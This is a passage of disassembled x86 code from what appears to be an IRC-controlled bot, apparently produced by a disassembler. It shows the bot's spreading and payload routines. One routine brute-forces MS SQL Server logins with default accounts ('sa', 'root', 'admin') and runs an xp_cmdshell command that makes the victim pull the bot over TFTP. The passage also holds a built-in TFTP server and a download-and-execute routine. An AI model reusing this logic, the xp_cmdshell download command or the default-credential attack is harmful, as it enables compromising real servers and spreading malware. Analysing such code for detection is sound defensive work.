mov [eax+esi], ecx
mov ecx, ds:dword_424644
add eax, 0Ch
mov [eax+esi], ecx
mov ecx, ds:dword_424644
lea eax, [eax+esi+24h]
mov [eax], ecx
mov ecx, ds:dword_424644
mov [eax+0Ch], ecx
jmp short loc_41AF21
; ---------------------------------------------------------------------------
loc_41AF07: ; CODE XREF: sub_41A9DE+4FB�j
cmp [esp+8+arg_8], 0
jnz short loc_41AF21
push 10h
add eax, esi
pop ecx
loc_41AF13: ; CODE XREF: sub_41A9DE+541�j
mov edx, ds:dword_424644
mov [eax], edx
add eax, 4
dec ecx
jnz short loc_41AF13
loc_41AF21: ; CODE XREF: sub_41A9DE+527�j
; sub_41A9DE+52E�j
mov edi, [esp+8+arg_18]
add edi, 42h
push edi
call sub_4036E0
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_41B13C
push edi
push 0
push ebx
call sub_407B70
push 5
pop ecx
lea esi, [esp+14h+arg_94]
mov edi, ebx
rep movsd
mov esi, [esp+14h+arg_18]
mov eax, esi
test eax, eax
mov [esp+14h+arg_C], eax
fild [esp+14h+arg_C]
jge short loc_41AF68
fadd ds:flt_420D38
loc_41AF68: ; CODE XREF: sub_41A9DE+582�j
fmul ds:dbl_420D30
add esp, 4
fstp [esp+10h+arg_C]
fld [esp+10h+arg_C]
fstp qword ptr [esp]
call sub_403DA0
fstp [esp+10h+arg_C]
fld [esp+10h+arg_C]
call sub_41C156
and dword ptr [ebx+18h], 0
push esi
push [esp+14h+arg_4]
mov [ebx+1Ch], eax
mov [ebx+14h], eax
lea eax, [ebx+20h]
push eax
call sub_407BF0
add esp, 14h
lea eax, [esi+20h]
jmp short loc_41AFAF
; ---------------------------------------------------------------------------
loc_41AFAE: ; CODE XREF: sub_41A9DE+5D3�j
inc eax
loc_41AFAF: ; CODE XREF: sub_41A9DE+5CE�j
test al, 3
jnz short loc_41AFAE
push 7
lea edi, [ebx+eax]
pop ecx
push [esp+8+arg_4]
add eax, 1Ch
lea esi, [esp+0Ch+arg_78]
rep movsd
mov [esp+0Ch+arg_14], eax
call sub_403603
pop ecx
push 6
xor eax, eax
pop ecx
lea edi, [esp+8+arg_28]
rep stosd
mov byte ptr [esp+8+arg_28+1], al
mov byte ptr [esp+8+arg_28+2], al
lea edi, [esp+8+arg_40]
stosd
xor esi, esi
stosd
stosd
push esi
push esi
stosd
push 1
push esi
mov byte ptr [esp+18h+arg_28], 5
mov byte ptr [esp+18h+arg_28+3], 3
mov [esp+18h+arg_2C], 10h
mov word ptr [esp+18h+arg_30+2], si
mov [esp+18h+arg_34], esi
mov word ptr [esp+18h+arg_3C], si
mov word ptr [esp+18h+arg_3C+2], 1Fh
stosd
call ds:dword_41D09C
mov dword ptr [esp+8+arg_50], eax
mov byte ptr [esp+0Fh], 0
mov [esp+8+arg_4], esi
loc_41B030: ; CODE XREF: sub_41A9DE+6E4�j
cmp [esp+8+arg_4], 2
jge loc_41B0C8
inc [esp+8+arg_4]
push 1
push 10B8h
push [esp+10h+arg_14]
lea esi, [esp+14h+arg_28]
push ebx
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [esp+30h+arg_0]
rep movsd
call sub_416D6C
add esp, 2Ch
test al, al
jz short loc_41B0C8
cmp dword ptr [esp+8+arg_50], 0
jz short loc_41B0BD
lea eax, [esp+8+arg_40]
push eax
lea eax, [esp+0Ch+arg_20]
push eax
push 2000h
lea eax, [esp+14h+arg_4410]
push eax
push [esp+18h+arg_0]
call ds:dword_41D078
test eax, eax
jnz short loc_41B0A2
call ds:dword_41D0F0
cmp eax, 3E5h
jnz short loc_41B0BD
loc_41B0A2: ; CODE XREF: sub_41A9DE+6B5�j
push 3E8h
push dword ptr [esp+0Ch+arg_50]
call ds:dword_41D07C
cmp eax, 102h
jnz short loc_41B0BD
mov byte ptr [esp+0Fh], 1
loc_41B0BD: ; CODE XREF: sub_41A9DE+690�j
; sub_41A9DE+6C2�j ...
cmp byte ptr [esp+0Fh], 0
jz loc_41B030
loc_41B0C8: ; CODE XREF: sub_41A9DE+657�j
; sub_41A9DE+689�j
push [esp+8+arg_0]
mov esi, ds:dword_41D0DC
call esi
push ebx
call sub_403603
cmp [esp+10h+arg_4C], 0
pop ecx
jz short loc_41B0E8
push [esp+0Ch+arg_4C]
call esi
loc_41B0E8: ; CODE XREF: sub_41A9DE+702�j
cmp byte ptr [esp+0Fh], 0
jnz short loc_41B149
cmp [esp+0Ch+arg_4], 0
jnz short loc_41B10F
mov [esp+0Ch+arg_4], 1
xor ebx, ebx
jmp loc_41AA2A
; ---------------------------------------------------------------------------
loc_41B105: ; CODE XREF: sub_41A9DE+1E5�j
; sub_41A9DE+2F7�j
push [esp+8+arg_0]
call ds:dword_41D0DC
loc_41B10F: ; CODE XREF: sub_41A9DE+51�j
; sub_41A9DE+B9�j ...
xor al, al
loc_41B111: ; CODE XREF: sub_41A9DE+7BD�j
mov ecx, [esp+0Ch+arg_6410]
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41B126: ; CODE XREF: sub_41A9DE+49D�j
; sub_41A9DE+4D0�j
push [esp+8+arg_0]
call ds:dword_41D0DC
push [esp+0Ch+arg_0]
loc_41B134: ; CODE XREF: sub_41A9DE+769�j
call sub_403603
pop ecx
jmp short loc_41B10F
; ---------------------------------------------------------------------------
loc_41B13C: ; CODE XREF: sub_41A9DE+555�j
push [esp+8+arg_0]
call ds:dword_41D0DC
push esi
jmp short loc_41B134
; ---------------------------------------------------------------------------
loc_41B149: ; CODE XREF: sub_41A9DE+70F�j
push [esp+0Ch+arg_20]
call ds:dword_41D260
push eax
mov eax, [esp+10h+arg_1EC]
imul eax, 2Ch
add eax, offset dword_424528
push eax
push offset aSExploitedS_ ; "%s: Exploited: %s."
lea eax, [esp+18h+arg_EC]
push eax
push [esp+1Ch+arg_1F8]
push offset dword_4269BC
call sub_417361
mov eax, [esp+24h+arg_1EC]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
mov al, [esp+0Fh]
jmp loc_41B111
sub_41A9DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CD8h
sub_41B1A0 proc near ; DATA XREF: seg002:0042457C�o
var_D54 = dword ptr -0D54h
var_D50 = dword ptr -0D50h
var_D4C = dword ptr -0D4Ch
var_D48 = dword ptr -0D48h
var_D44 = byte ptr -0D44h
var_D40 = dword ptr -0D40h
var_D3C = dword ptr -0D3Ch
var_D38 = dword ptr -0D38h
var_D34 = dword ptr -0D34h
var_D30 = dword ptr -0D30h
var_D2C = dword ptr -0D2Ch
var_D26 = byte ptr -0D26h
var_D25 = byte ptr -0D25h
var_D24 = byte ptr -0D24h
var_C24 = dword ptr -0C24h
var_C20 = dword ptr -0C20h
var_C1C = dword ptr -0C1Ch
var_C18 = dword ptr -0C18h
var_C14 = byte ptr -0C14h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-0CD8h]
sub esp, 0D54h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+0CD8h+var_4], eax
push ebx
push esi
push edi
push 44h
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+0CD8h+var_14], bl
lea esi, [ebp+0CD8h+arg_0]
lea edi, [ebp+0CD8h+var_D24]
rep movsd
lea edi, [ebp+0CD8h+var_13]
stosd
stosd
stosd
stosw
stosb
mov eax, [ebp+0CD8h+var_C20]
mov [ebp+0CD8h+var_D40], eax
lea eax, [ebp+0CD8h+var_D34]
push eax
push ebx
push 1
mov [ebp+0CD8h+var_D26], bl
mov [ebp+0CD8h+var_D54], offset aSa ; "sa"
mov [ebp+0CD8h+var_D50], offset aRoot ; "root"
mov [ebp+0CD8h+var_D4C], offset aAdmin ; "admin"
mov [ebp+0CD8h+var_D48], ebx
mov [ebp+0CD8h+var_D25], bl
mov [ebp+0CD8h+var_D2C], ebx
mov [ebp+0CD8h+var_D30], ebx
call sub_402630
test ax, ax
jz short loc_41B23A
loc_41B220: ; CODE XREF: sub_41B1A0+AE�j
xor al, al
loc_41B222: ; CODE XREF: sub_41B1A0+CF�j
mov ecx, [ebp+0CD8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 0CD8h
leave
retn
; ---------------------------------------------------------------------------
loc_41B23A: ; CODE XREF: sub_41B1A0+7E�j
push 0FFFFFFFAh
push 3
push 0C8h
push [ebp+0CD8h+var_D34]
call sub_402624
test ax, ax
jnz short loc_41B220
lea eax, [ebp+0CD8h+var_D2C]
push eax
push [ebp+0CD8h+var_D34]
push 2
call sub_402630
test ax, ax
jz short loc_41B271
loc_41B263: ; CODE XREF: sub_41B1A0+22B�j
push [ebp+0CD8h+var_D34]
push 1
call sub_402636
mov al, bl
jmp short loc_41B222
; ---------------------------------------------------------------------------
loc_41B271: ; CODE XREF: sub_41B1A0+C1�j
mov edi, ds:dword_41D260
lea ecx, [ebp+0CD8h+var_D54]
mov [ebp+0CD8h+var_D3C], ecx
loc_41B27D: ; CODE XREF: sub_41B1A0+1D0�j
cmp ds:off_424650, ebx
mov [ebp+0CD8h+var_D38], ebx
jz loc_41B365
mov esi, [ecx]
mov eax, offset off_424650
loc_41B293: ; CODE XREF: sub_41B1A0+16B�j
lea ecx, [ebp+0CD8h+var_D26]
push ecx
push dword ptr [eax]
push esi
push [ebp+0CD8h+var_C1C]
push [ebp+0CD8h+var_D40]
call edi
push eax
lea eax, [ebp+0CD8h+var_414]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_4030B5
lea eax, [ebp+0CD8h+var_414]
add esp, 1Ch
lea ecx, [eax+1]
loc_41B2C3: ; CODE XREF: sub_41B1A0+128�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41B2C3
push ebx
sub eax, ecx
lea ecx, [ebp+0CD8h+var_D44]
push ecx
push 400h
lea ecx, [ebp+0CD8h+var_C14]
push ecx
push eax
lea eax, [ebp+0CD8h+var_414]
push eax
push ebx
push [ebp+0CD8h+var_D2C]
call sub_40262A
movzx eax, ax
cmp ax, bx
jz short loc_41B30F
cmp ax, 1
jz short loc_41B30F
inc [ebp+0CD8h+var_D38]
mov eax, [ebp+0CD8h+var_D38]
lea eax, ds:424650h[eax*4]
cmp [eax], ebx
jnz short loc_41B293
jmp short loc_41B365
; ---------------------------------------------------------------------------
loc_41B30F: ; CODE XREF: sub_41B1A0+154�j
; sub_41B1A0+15A�j
lea eax, [ebp+0CD8h+var_D30]
push eax
push [ebp+0CD8h+var_D2C]
push 3
call sub_402630
push ds:dword_4269BC
lea esi, [ebp+0CD8h+var_14]
call sub_418FC6
mov eax, esi
push eax
lea eax, [ebp+0CD8h+var_814]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
push eax
call sub_4030B5
add esp, 10h
push 0FFFFFFFDh
lea eax, [ebp+0CD8h+var_814]
push eax
push [ebp+0CD8h+var_D30]
call sub_40263C
test ax, ax
jz short loc_41B378
push [ebp+0CD8h+var_D30]
push 3
call sub_402636
loc_41B365: ; CODE XREF: sub_41B1A0+E6�j
; sub_41B1A0+16D�j
mov ecx, [ebp+0CD8h+var_D3C]
add ecx, 4
cmp [ecx], ebx
mov [ebp+0CD8h+var_D3C], ecx
jnz loc_41B27D
jmp short loc_41B3BE
; ---------------------------------------------------------------------------
loc_41B378: ; CODE XREF: sub_41B1A0+1B9�j
push [ebp+0CD8h+var_D40]
mov [ebp+0CD8h+var_D25], 1
call edi
push eax
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
add eax, offset dword_424528
push eax
push offset aSExploitedS__0 ; "%s: Exploited %s."
lea eax, [ebp+0CD8h+var_D24]
push eax
push [ebp+0CD8h+var_C18]
push offset dword_4269BC
call sub_417361
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
loc_41B3BE: ; CODE XREF: sub_41B1A0+1D6�j
push [ebp+0CD8h+var_D2C]
push 2
call sub_402636
mov bl, [ebp+0CD8h+var_D25]
jmp loc_41B263
sub_41B1A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3D0 proc near ; DATA XREF: sub_41B5D2+15A�o
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = word ptr -224h
var_222 = word ptr -222h
var_220 = byte ptr -220h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 240h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
jnz short loc_41B3F6
loc_41B3EF: ; CODE XREF: sub_41B3D0+42�j
; sub_41B3D0+5D�j ...
push ebx
call ds:dword_41D08C
loc_41B3F6: ; CODE XREF: sub_41B3D0+1D�j
lea edi, [ebp+var_18]
movsd
movsd
push 11h
movsd
push 2
push 2
movsd
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov [ebp+var_230], eax
jz short loc_41B3EF
push offset aRb ; "rb"
push offset dword_4269E8
call sub_4031F4
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_228], eax
jz short loc_41B3EF
push eax
mov [ebp+var_22C], ebx
mov [ebp+var_23C], 10h
call sub_403AF3
test eax, eax
pop ecx
jnz loc_41B53E
mov esi, ds:dword_41D278
loc_41B454: ; CODE XREF: sub_41B3D0+168�j
push 204h
lea eax, [ebp+var_224]
push ebx
push eax
call sub_407B70
add esp, 0Ch
xor eax, eax
inc [ebp+var_22C]
push [ebp+var_22C]
lea edi, [ebp+var_238]
stosd
call esi
push 3
mov [ebp+var_222], ax
call esi
push [ebp+var_228]
mov [ebp+var_224], ax
push 200h
lea eax, [ebp+var_220]
push 1
push eax
call sub_403D7F
mov edi, [ebp+var_230]
add esp, 10h
push 10h
lea ecx, [ebp+var_18]
push ecx
push ebx
add eax, 4
push eax
lea eax, [ebp+var_224]
push eax
push edi
call ds:dword_41D24C
cmp eax, 0FFFFFFFFh
jz loc_41B5BA
lea eax, [ebp+var_23C]
push eax
lea eax, [ebp+var_18]
push eax
push ebx
push 4
lea eax, [ebp+var_238]
push eax
push edi
call ds:dword_41D25C
cmp eax, 0FFFFFFFFh
jz loc_41B5BA
push [ebp+var_238]
call ds:dword_41D254
cmp ax, 4
jnz loc_41B5BA
push [ebp+var_238+2]
call ds:dword_41D254
cmp ax, word ptr [ebp+var_22C]
jnz loc_41B5BA
push [ebp+var_228]
call sub_403AF3
test eax, eax
pop ecx
jz loc_41B454
loc_41B53E: ; CODE XREF: sub_41B3D0+78�j
inc ds:dword_43394C
push 100h
call sub_402648
mov esi, eax
push esi
call sub_402A45
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
add esp, 0Ch
push ds:dword_43394C
push [ebp+var_14]
call ds:dword_41D260
push eax
push offset aTftpSendComple ; "TFTP: Send Complete To %s. %d Total Sen"...
push esi
push 0
push offset dword_4269BC
call sub_417361
push esi
call sub_402B9B
add esp, 1Ch
push [ebp+var_230]
call ds:dword_41D224
push [ebp+var_228]
call sub_4034C4
pop ecx
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
xor eax, eax
pop ebx
call sub_402710
leave
retn 4
; ---------------------------------------------------------------------------
loc_41B5BA: ; CODE XREF: sub_41B3D0+100�j
; sub_41B3D0+125�j ...
push edi
call ds:dword_41D224
push [ebp+var_228]
call sub_4034C4
pop ecx
jmp loc_41B3EF
sub_41B3D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B5D2 proc near ; DATA XREF: sub_41B775+53�o
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = byte ptr -138h
var_134 = dword ptr -134h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 14Ch
mov eax, ds:dword_423064
xor eax, esp
mov [esp+14Ch+var_4], eax
push ebx
push esi
push edi
push 11h
xor esi, esi
push 2
inc esi
push 2
mov [esp+164h+var_140], esi
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov ds:dword_4269E4, eax
jnz short loc_41B61B
xor ebx, ebx
loc_41B60E: ; CODE XREF: sub_41B5D2+C1�j
mov ds:byte_433945, bl
loc_41B614: ; CODE XREF: sub_41B5D2+BF�j
push ebx
call ds:dword_41D08C
loc_41B61B: ; CODE XREF: sub_41B5D2+38�j
push 4
lea ecx, [esp+15Ch+var_140]
push ecx
push 4
push 0FFFFh
push eax
call ds:dword_41D250
xor eax, eax
lea edi, [esp+158h+var_14]
stosd
stosd
stosd
stosd
push 45h
mov [esp+15Ch+var_14], 2
call ds:dword_41D278
mov [esp+158h+var_12], ax
push 10h
lea eax, [esp+15Ch+var_14]
push eax
push ds:dword_4269E4
xor ebx, ebx
mov [esp+164h+var_10], ebx
call ds:dword_41D26C
cmp eax, 0FFFFFFFFh
jnz loc_41B744
push ds:dword_4269E4
call ds:dword_41D224
cmp ds:byte_433945, bl
jz short loc_41B614
jmp loc_41B60E
; ---------------------------------------------------------------------------
loc_41B698: ; CODE XREF: sub_41B5D2+178�j
mov eax, ds:dword_4269E4
mov [esp+158h+var_11C], eax
xor eax, eax
lea edi, [esp+158h+var_148]
stosd
stosd
lea eax, [esp+158h+var_148]
push eax
push ebx
push ebx
lea eax, [esp+164h+var_120]
push eax
push ebx
mov [esp+16Ch+var_120], esi
mov [esp+16Ch+var_148], 5
mov [esp+16Ch+var_144], ebx
call ds:dword_41D258
test eax, eax
jle short loc_41B744
xor eax, eax
lea edi, [esp+158h+var_134]
stosd
stosd
stosd
stosd
stosd
lea eax, [esp+158h+var_13C]
push eax
lea eax, [esp+15Ch+var_14]
push eax
push ebx
push 14h
lea eax, [esp+168h+var_134]
push eax
push ds:dword_4269E4
mov [esp+170h+var_13C], 10h
call ds:dword_41D25C
cmp eax, 0FFFFFFFFh
jz short loc_41B744
push [esp+158h+var_134]
inc ds:dword_433948
call ds:dword_41D254
cmp ax, si
jnz short loc_41B744
lea eax, [esp+158h+var_138]
push eax
push ebx
lea eax, [esp+160h+var_14]
push eax
push offset sub_41B3D0
push ebx
push ebx
call ds:dword_41D110
push 3E8h
call ds:dword_41D0FC
loc_41B744: ; CODE XREF: sub_41B5D2+A7�j
; sub_41B5D2+FC�j ...
cmp ds:byte_433945, bl
jnz loc_41B698
push ds:dword_4269E4
call ds:dword_41D224
mov ecx, [esp+158h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_41B5D2 endp
; =============== S U B R O U T I N E =======================================
sub_41B775 proc near ; CODE XREF: sub_401F1C+5A�p
; seg000:0041BFB5�p
push 4
mov eax, offset loc_41C274
call sub_4045CC
xor ebx, ebx
cmp ds:byte_433945, bl
jz short loc_41B78F
loc_41B78B: ; CODE XREF: sub_41B775+74�j
mov al, 1
jmp short loc_41B7F3
; ---------------------------------------------------------------------------
loc_41B78F: ; CODE XREF: sub_41B775+14�j
mov edi, 100h
push edi
push ebx
mov esi, offset dword_4269E8
push esi
call sub_407B70
add esp, 0Ch
push edi
push esi
push ebx
call ds:dword_41D0E4
push eax
call ds:dword_41D060
push 8
call sub_40304B
mov esi, eax
pop ecx
mov [ebp-10h], esi
cmp esi, ebx
mov [ebp-4], ebx
jz short loc_41B7DB
push offset sub_41B5D2
xor ecx, ecx
mov edi, offset aTftpServer ; "TFTP Server"
call sub_4140AB
jmp short loc_41B7DD
; ---------------------------------------------------------------------------
loc_41B7DB: ; CODE XREF: sub_41B775+51�j
xor eax, eax
loc_41B7DD: ; CODE XREF: sub_41B775+64�j
cmp [eax+4], ebx
jz short loc_41B7EB
mov ds:byte_433945, 1
jmp short loc_41B78B
; ---------------------------------------------------------------------------
loc_41B7EB: ; CODE XREF: sub_41B775+6B�j
mov ds:byte_433945, bl
xor al, al
loc_41B7F3: ; CODE XREF: sub_41B775+18�j
call sub_40466B
retn
sub_41B775 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7F9 proc near ; CODE XREF: sub_40177B+6C�p
; sub_4019F3+6C�p ...
var_3DC = dword ptr -3DCh
var_3D8 = byte ptr -3D8h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 3E0h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+3E0h+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, 1FFh
xor ebx, ebx
push esi
mov [esp+3ECh+var_3DC], eax
lea eax, [esp+3ECh+var_207]
push ebx
push eax
mov [esp+3F4h+var_208], bl
call sub_407B70
add esp, 0Ch
push 0FFh
lea eax, [esp+3ECh+var_307]
push ebx
push eax
mov [esp+3F4h+var_308], bl
call sub_407B70
add esp, 0Ch
lea eax, [esp+3E8h+var_3D8]
call sub_4143A0
push [esp+3E8h+var_3DC]
lea eax, [esp+3ECh+var_208]
push offset aS_15 ; "%s"
push esi
push eax
call sub_402AEE
lea eax, [esp+3F8h+var_208]
add esp, 10h
lea esi, [eax+1]
loc_41B886: ; CODE XREF: sub_41B7F9+92�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41B886
lea ecx, [esp+3E8h+var_3D8]
push ecx
sub eax, esi
push eax
lea ecx, [esp+3F0h+var_208]
call sub_416C60
push 200h
lea eax, [esp+3F4h+var_208]
push ebx
push eax
call sub_407B70
lea eax, [esp+3FCh+var_308]
add esp, 14h
push eax
lea ebx, [esp+3ECh+var_3D8]
call sub_416AE0
pop ecx
push 0C0h
push 0
push edi
call sub_407B70
add esp, 0Ch
xor esi, esi
loc_41B8DB: ; CODE XREF: sub_41B7F9+114�j
movzx eax, [esp+esi+3E8h+var_308]
push eax
push edi
push offset aSX ; "%s%X"
push 0BFh
push edi
call sub_402AEE
mov eax, edi
add esp, 14h
lea ecx, [eax+1]
loc_41B8FD: ; CODE XREF: sub_41B7F9+109�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41B8FD
sub eax, ecx
inc esi
cmp esi, 40h
mov [eax+edi], dl
jl short loc_41B8DB
mov ecx, [esp+3E8h+var_4]
pop esi
pop ebx
xor ecx, esp
mov eax, edi
call sub_402710
mov esp, ebp
pop ebp
retn
sub_41B7F9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 754h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+750h], eax
push ebx
push esi
mov esi, [ebp+8]
push edi
mov ecx, 0C9h
lea edi, [esp+28h]
rep movsd
xor ebx, ebx
push ebx
push ebx
push ebx
movsw
push ebx
push offset aMozilla5_0 ; "Mozilla/5.0"
movsb
call ds:dword_41D21C
mov esi, eax
lea eax, [esp+24Bh]
push eax
lea eax, [esp+14Fh]
push eax
push offset aDlDownloadingS ; "DL: Downloading %s to %s"
lea eax, [esp+34h]
push eax
push dword ptr [esp+35Dh]
mov edi, offset dword_4269BC
push edi
call sub_417361
add esp, 18h
push ebx
push ebx
push ebx
push ebx
lea eax, [esp+15Bh]
push eax
push esi
call ds:dword_41D218
cmp esi, ebx
mov [esp+1Ch], eax
jz loc_41BB44
cmp eax, ebx
jz loc_41BB3D
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [esp+263h]
push eax
call ds:dword_41D06C
mov [esp+18h], eax
call ds:dword_41D108
mov [esp+20h], eax
mov [esp+10h], ebx
mov esi, 400h
loc_41B9EC: ; CODE XREF: seg000:0041BA44�j
push esi
lea eax, [esp+35Ch]
push ebx
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+14h]
push eax
push esi
lea eax, [esp+360h]
push eax
push dword ptr [esp+28h]
call ds:dword_41D214
push ebx
lea eax, [esp+28h]
push eax
push dword ptr [esp+1Ch]
lea eax, [esp+364h]
push eax
push dword ptr [esp+28h]
call ds:dword_41D088
test eax, eax
jz loc_41BAEF
mov eax, [esp+14h]
add [esp+10h], eax
cmp eax, ebx
ja short loc_41B9EC
call ds:dword_41D108
sub eax, [esp+20h]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ecx, eax
cmp ecx, ebx
jnz short loc_41BA62
xor ecx, ecx
inc ecx
loc_41BA62: ; CODE XREF: seg000:0041BA5D�j
mov eax, [esp+10h]
xor edx, edx
div ecx
shr eax, 0Ah
push eax
push ecx
push dword ptr [esp+18h]
lea eax, [esp+257h]
push eax
push offset aDlDownloadSIBy ; "DL: Download %s (%i Bytes) finished in "...
lea eax, [esp+3Ch]
push eax
push dword ptr [esp+365h]
push edi
call sub_417361
add esp, 20h
push dword ptr [esp+18h]
call ds:dword_41D0DC
cmp byte ptr [esp+34Bh], 1
jnz loc_41BB5E
cmp [esp+34Ch], bl
lea eax, [esp+24Bh]
jz short loc_41BAFD
push eax
call sub_419219
test al, al
pop ecx
lea eax, [esp+28h]
jz short loc_41BAF6
push offset aMainUninstalli ; "Main: Uninstalling Drone"
push eax
push dword ptr [esp+355h]
push edi
call sub_417361
add esp, 10h
lea eax, [esp+128h]
push eax
call sub_419477
loc_41BAEF: ; CODE XREF: seg000:0041BA34�j
push offset aDlFailedBadLoc ; "DL: Failed; Bad Location."
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BAF6: ; CODE XREF: seg000:0041BACA�j
push offset aDlFailedToUpda ; "DL: Failed To Update"
jmp short loc_41BB4D
; ---------------------------------------------------------------------------
loc_41BAFD: ; CODE XREF: seg000:0041BABB�j
push 5
push ebx
push ebx
push eax
push offset byte_41EF0F
push ebx
call ds:dword_41D1E4
test eax, eax
jnz short loc_41BB19
push offset aDlErrorExecuti ; "DL: Error Executing File."
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BB19: ; CODE XREF: seg000:0041BB10�j
lea eax, [esp+24Bh]
push eax
push offset aDlExecutedFile ; "DL: Executed File: %s"
lea eax, [esp+30h]
push eax
push dword ptr [esp+359h]
push edi
call sub_417361
add esp, 14h
jmp short loc_41BB5E
; ---------------------------------------------------------------------------
loc_41BB3D: ; CODE XREF: seg000:0041B9B6�j
push offset aDlFailedBadUrl ; "DL: Failed; Bad URL"
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BB44: ; CODE XREF: seg000:0041B9AE�j
push offset aDlFailedWinine ; "DL: Failed; WinINET Error"
loc_41BB49: ; CODE XREF: seg000:0041BAF4�j
; seg000:0041BB17�j ...
lea eax, [esp+2Ch]
loc_41BB4D: ; CODE XREF: seg000:0041BAFB�j
push eax
push dword ptr [esp+355h]
push edi
call sub_417361
add esp, 10h
loc_41BB5E: ; CODE XREF: seg000:0041BAA7�j
; seg000:0041BB3B�j
call ds:dword_41D0E0
push eax
call sub_414042
pop ecx
mov ecx, [esp+75Ch]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB84 proc near ; CODE XREF: seg000:0041C3B5�p
; seg000:0041C3D1�p ...
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_104]
push 100h
push eax
mov dword ptr [esi], offset off_420A74
mov [ebp+var_108], esi
call sub_402AEE
mov eax, ds:dword_433C40
add esp, 0Ch
lea edx, [ebp+var_108]
push edx
mov ecx, offset dword_433C3C
push eax
push ecx
call sub_40121E
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402710
leave
retn 4
sub_41BB84 endp
; ---------------------------------------------------------------------------
loc_41BBE3: ; CODE XREF: seg000:004040AA�p
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 724h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+720h], eax
mov eax, [ebp+10h]
push ebx
push esi
push edi
mov [esp+10h], eax
call sub_419677
test al, al
jz short loc_41BC29
loc_41BC10: ; CODE XREF: seg000:0041BDA1�j
; seg000:0041BDCC�j ...
mov ecx, [esp+72Ch]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_41BC29: ; CODE XREF: seg000:0041BC0E�j
call sub_4195EC
test al, al
jnz loc_41C061
call ds:dword_41D090
test eax, eax
jnz loc_41C061
mov esi, offset aIrn ; "--irn "
lea edi, [esp+248h]
movsd
movsw
movsb
mov edi, 103h
xor ebx, ebx
push edi
lea eax, [esp+625h]
push ebx
push eax
mov [esp+62Ch], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+415h]
push ebx
push eax
mov [esp+41Ch], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+30Dh]
push ebx
push eax
mov [esp+314h], bl
call sub_407B70
add esp, 0Ch
push 7Fh
